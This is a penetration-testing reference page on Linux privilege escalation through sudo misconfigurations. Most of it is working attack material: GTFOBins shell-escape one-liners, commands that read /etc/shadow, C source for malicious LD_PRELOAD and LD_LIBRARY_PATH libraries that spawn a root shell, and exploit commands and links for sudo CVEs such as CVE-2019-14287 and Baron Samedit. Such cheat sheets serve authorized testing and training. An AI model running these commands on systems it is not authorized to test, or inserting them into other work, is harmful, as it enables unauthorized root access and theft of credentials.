> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Sudo Abuse

> Privilege escalation via sudo misconfigurations: GTFOBins, LD_PRELOAD, env_keep, and sudo CVEs.

## Check Sudo Permissions

```bash theme={"dark"}
sudo -l
```

Look for:

* `NOPASSWD` — no password required
* `(ALL)` or `(root)` — runs as root
* Specific binaries — check GTFOBins

***

## GTFOBins — Sudo

```bash theme={"dark"}
https://gtfobins.github.io/#+sudo
```

### Common Entries

#### vim

```bash theme={"dark"}
sudo vim -c ':!/bin/bash'
```

#### find

```bash theme={"dark"}
sudo find / -exec /bin/bash \;
```

#### python

```bash theme={"dark"}
sudo python3 -c 'import os; os.system("/bin/bash")'
```

#### perl

```bash theme={"dark"}
sudo perl -e 'exec "/bin/bash";'
```

#### less

```bash theme={"dark"}
sudo less /etc/shadow
!/bin/bash
```

#### awk

```bash theme={"dark"}
sudo awk 'BEGIN {system("/bin/bash")}'
```

#### nmap

```bash theme={"dark"}
sudo nmap --interactive
!sh
```

#### env

```bash theme={"dark"}
sudo env /bin/bash
```

#### tar

```bash theme={"dark"}
sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash
```

#### zip

```bash theme={"dark"}
sudo zip /tmp/a.zip /tmp/a -T --unzip-command="sh -c /bin/bash"
```

#### man

```bash theme={"dark"}
sudo man man
!/bin/bash
```

#### apache2

```bash theme={"dark"}
sudo apache2 -f /etc/shadow
```

Leaks first line of file in error output.

***

## LD\_PRELOAD

If `sudo -l` shows `env_keep+=LD_PRELOAD`:

### Malicious Shared Library

```c theme={"dark"}
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
```

Compile:

```bash theme={"dark"}
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
```

Execute with any allowed sudo command:

```bash theme={"dark"}
sudo LD_PRELOAD=/tmp/preload.so /usr/bin/any_allowed_binary
```

***

## LD\_LIBRARY\_PATH

If `env_keep+=LD_LIBRARY_PATH`:

### Find Shared Libraries

```bash theme={"dark"}
ldd /usr/bin/allowed_binary
```

### Hijack Library

```c theme={"dark"}
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}
```

```bash theme={"dark"}
gcc -shared -fPIC -o /tmp/libhijack.so hijack.c
sudo LD_LIBRARY_PATH=/tmp /usr/bin/allowed_binary
```

***

## Sudo CVEs

### CVE-2021-3156 — Baron Samedit (sudo \< 1.9.5p2)

Heap buffer overflow in sudo. Any user → root.

Check version:

```bash theme={"dark"}
sudo -V | head -1
```

Check vulnerable:

```bash theme={"dark"}
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
```

If segfault → vulnerable.

Exploits:

```bash theme={"dark"}
https://github.com/blasty/CVE-2021-3156
https://github.com/worawit/CVE-2021-3156
```

### CVE-2019-14287 — Sudo Bypass (sudo \< 1.8.28)

If sudoers has `(ALL, !root) NOPASSWD: /bin/bash`:

```bash theme={"dark"}
sudo -u#-1 /bin/bash
```

`-1` wraps to UID 0 (root).

### CVE-2019-18634 — Sudo pwfeedback (sudo \< 1.8.31)

If `pwfeedback` is enabled in `/etc/sudoers`:

```bash theme={"dark"}
perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S -k id
```

***

## Sudo Shell Escape Sequences

Some programs allow shell escape:

| Program  | Escape                   |
| -------- | ------------------------ |
| `vi/vim` | `:!bash`                 |
| `less`   | `!bash`                  |
| `more`   | `!bash`                  |
| `man`    | `!bash`                  |
| `ftp`    | `!bash`                  |
| `gdb`    | `!bash`                  |
| `nmap`   | `!sh` (interactive mode) |
